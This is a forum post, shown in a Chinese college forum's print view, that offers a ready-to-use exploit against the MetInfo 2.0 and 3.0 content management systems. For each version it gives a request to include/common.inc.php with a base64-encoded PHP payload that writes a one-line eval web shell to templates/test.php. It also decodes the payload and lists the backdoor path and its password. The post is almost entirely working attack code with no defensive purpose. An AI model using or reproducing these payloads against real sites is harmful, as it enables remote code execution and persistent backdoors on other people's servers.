广西经贸职业技术学院论坛

标题: MetInfo2.0-3.0 [打印本页]

---

作者: 曾经沧海    时间: 2010-11-5 22:20
标题: MetInfo2.0-3.0
2.0
+poc:
include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]

+Exploit:
/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');
backdoor：http://site/templates/test.php                            password:c

-----------------------------------------------------------------------------------------
3.0
+POC：/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');

backdoor：http://site/templates/test.php                            password:c

---

欢迎光临 广西经贸职业技术学院论坛 (http://gxjmbbs.com/)

Powered by Discuz! X3.2